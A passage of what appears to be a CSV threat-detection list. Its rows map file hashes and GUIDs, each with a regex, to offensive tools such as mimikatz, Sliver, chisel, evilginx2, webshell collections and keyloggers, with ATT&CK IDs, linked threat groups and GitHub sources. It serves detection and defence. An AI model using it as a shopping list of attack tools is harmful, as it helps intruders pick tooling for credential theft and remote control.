This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","#filehash","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","30764" "*8c81afc8fcbd100d5793d4c31399e10132f74c77212655c73799ebea7fe95dc3*",".{0,1000}8c81afc8fcbd100d5793d4c31399e10132f74c77212655c73799ebea7fe95dc3.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30765" "*8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389*",".{0,1000}8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","30766" "*8c866a47872113274363ad6f3ca399d6e3cb45b99ce5e47a579ef1eb31fb0bcf*",".{0,1000}8c866a47872113274363ad6f3ca399d6e3cb45b99ce5e47a579ef1eb31fb0bcf.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30767" "*8c86f67b69545b19ac0260756440ec1f44ca63ce7cfde3a532a0f4ad6ae883e8*",".{0,1000}8c86f67b69545b19ac0260756440ec1f44ca63ce7cfde3a532a0f4ad6ae883e8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30768" "*8c8f3bc0d9ae33057bcbdb5e048691411bcefcb5c09c61951a7675237aa91b67*",".{0,1000}8c8f3bc0d9ae33057bcbdb5e048691411bcefcb5c09c61951a7675237aa91b67.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30769" "*8c90af89b3f0c90d39396210b6dc8dc19ff9e5ce183463a01affa6d30c5d7414*",".{0,1000}8c90af89b3f0c90d39396210b6dc8dc19ff9e5ce183463a01affa6d30c5d7414.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","30770" "*8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623*",".{0,1000}8c936f3b5bcd9dbb20a4d0602cdf26fbf3efe681134f20e510acda6561526623.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30771" "*8c96263d8ba4427c67bef9f7fc7bc57c04c6fb61849a19599cc52503fd701daa*",".{0,1000}8c96263d8ba4427c67bef9f7fc7bc57c04c6fb61849a19599cc52503fd701daa.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30772" "*8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38*",".{0,1000}8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 
- APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30773" "*8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38*",".{0,1000}8c97b09ebb432e60c9aef665c6db2be79a6439f1c59f683f36568f0bddda0c38.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - 
Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30774" "*8ca0c007508cf3a82966fe31b44d3917cb2d22e903bde3738565ffbe88f7fb8d*",".{0,1000}8ca0c007508cf3a82966fe31b44d3917cb2d22e903bde3738565ffbe88f7fb8d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30775" "*8cb1941c10e1fe16ee47229229d2ad1a95e9d356d12a5e7f31246d348b1d2419*",".{0,1000}8cb1941c10e1fe16ee47229229d2ad1a95e9d356d12a5e7f31246d348b1d2419.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30777" "*8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb*",".{0,1000}8cb1ea0098cf975a1ad6d61b2a387f8acf09ef8576ea836f838aa6ac9c0fb0fb.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30778" 
"*8cb248d6558fad8e94bc615b3db1ec567c6d9cd30d48f4dc58af4449d626abf7*",".{0,1000}8cb248d6558fad8e94bc615b3db1ec567c6d9cd30d48f4dc58af4449d626abf7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30779" "*8cb4a31c-11c4-49e4-8c7a-b9c6df93f5d8*",".{0,1000}8cb4a31c\-11c4\-49e4\-8c7a\-b9c6df93f5d8.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","30780" "*8cb53c48c37fe2974dc0b8240610e8b85e0802c6b1cf075a4af4e29d80546e5f*",".{0,1000}8cb53c48c37fe2974dc0b8240610e8b85e0802c6b1cf075a4af4e29d80546e5f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30781" "*8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8*",".{0,1000}8cb79a0a047793ff81319d7e4999732f8fcc49fbb2ba76f9ac38abf988c3eed8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30782" "*8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a*",".{0,1000}8ccc989ac8dfc5453a486361a7850f1add7e2f7dfe4016840671e8c183ed887a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30785" "*8ccf0e4161a841745e5ef8c6a2e46c48420b7eb010aa2aa3468b014e981949a5*",".{0,1000}8ccf0e4161a841745e5ef8c6a2e46c48420b7eb010aa2aa3468b014e981949a5.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","30786" "*8ccf6166988aeda295d01347726b682bff22950b5549d7276737d3084022b292*",".{0,1000}8ccf6166988aeda295d01347726b682bff22950b5549d7276737d3084022b292.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30787" "*8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474*",".{0,1000}8cd0ff4a46caae1508aaa14d69ac3393f05d2e58a1fd94d8c8b45a3ed6a6a474.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30788" "*8cd2f14abea20f3b1d96f3d535670b7463c8efbd01729fa00abdf20ab69f2792*",".{0,1000}8cd2f14abea20f3b1d96f3d535670b7463c8efbd01729fa00abdf20ab69f2792.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30789" "*8cda5ed686c75c07bd1e2bc6bd173c3ed48c1dc52dbde4c596d571ad1f1a92ba*",".{0,1000}8cda5ed686c75c07bd1e2bc6bd173c3ed48c1dc52dbde4c596d571ad1f1a92ba.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30791" "*8ceab34777527464cf217e5cda5008365e1a5c1c2197000bda78f303353308ac*",".{0,1000}8ceab34777527464cf217e5cda5008365e1a5c1c2197000bda78f303353308ac.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30792" "*8cfdfcb62203fc2bf0e80025b66cdb6606f02612dcadfd94328e481414dc570d*",".{0,1000}8cfdfcb62203fc2bf0e80025b66cdb6606f02612dcadfd94328e481414dc570d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30795" "*8cOpc1mnZbcpRkvRwqE8jeEvQdxxO67SVM6GP8rLbDdePzAzLVTbI23DCQCaMIgo*",".{0,1000}8cOpc1mnZbcpRkvRwqE8jeEvQdxxO67SVM6GP8rLbDdePzAzLVTbI23DCQCaMIgo.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30796" "*8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e*",".{0,1000}8d013a3cd78fc557c13657fbdf62382cace60d05dc73868184db4a5573bca34e.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit 
Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#filehash","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","30797" "*8d020f5a01e88c58f0ede5b1f58e63f30a170502c7a2817c86b1f97832cf515f*",".{0,1000}8d020f5a01e88c58f0ede5b1f58e63f30a170502c7a2817c86b1f97832cf515f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30798" "*8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182*",".{0,1000}8d0cbb7280381d6847295ae41a30dd19afb7a27141b95918561e52dbcc458182.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30800" "*8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc*",".{0,1000}8d0dac6d636eb3acfab0fd50442a8d404251266bcaf175eb4c119917e7ba32bc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30801" "*8d134034c936cf5b4015e47577954294a97e4440eac5d32271ff7355f517475e*",".{0,1000}8d134034c936cf5b4015e47577954294a97e4440eac5d32271ff7355f517475e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30803" "*8d192a48a06a7568284079c35ce1d16d4ec2d53319e4210b1138f87b7612edd9*",".{0,1000}8d192a48a06a7568284079c35ce1d16d4ec2d53319e4210b1138f87b7612edd9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30805" "*8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2*",".{0,1000}8d1f3e17106324aad99a98f5dd921db9d27a620b37cadc06a4c470f4404dfca2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30806" 
"*8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799*",".{0,1000}8d246f76d57dfa40f287d6d37f3a43c343b67c5db31f728d4568f2d8ed2d2799.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30811" "*8d2a5cc827299d47424631882399067acf41d040c5b2aacf95092aec22d90c97*",".{0,1000}8d2a5cc827299d47424631882399067acf41d040c5b2aacf95092aec22d90c97.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30812" "*8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36*",".{0,1000}8d2b6767f4a99a2bf89c412dd27424aeaf9f79ccd0640ab1257168c895c85f36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30813" "*8d2bb3201ed9277b0e4ec42e1aa56ec10bf05bcfcc4ad966656c428ac556d2e5*",".{0,1000}8d2bb3201ed9277b0e4ec42e1aa56ec10bf05bcfcc4ad966656c428ac556d2e5.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30814" "*8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87*",".{0,1000}8d3129341c603fa22b052f925fdf3bef054327c081299140d3c484f76254ca87.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30816" "*8d352347e622b8ff6babf1a119266f59c1b14a48cebc4cb2cf84c00edd276fe3*",".{0,1000}8d352347e622b8ff6babf1a119266f59c1b14a48cebc4cb2cf84c00edd276fe3.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#filehash","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","30817" "*8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105*",".{0,1000}8d3754efe45f18834003648a1e59e39b36675476e47db1c4e105cbe49ecf6105.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30818" "*8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3*",".{0,1000}8d3945448815d156c064445585aa7cf51a5c30e9f96d7598e8ca323815f9aee3.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - 
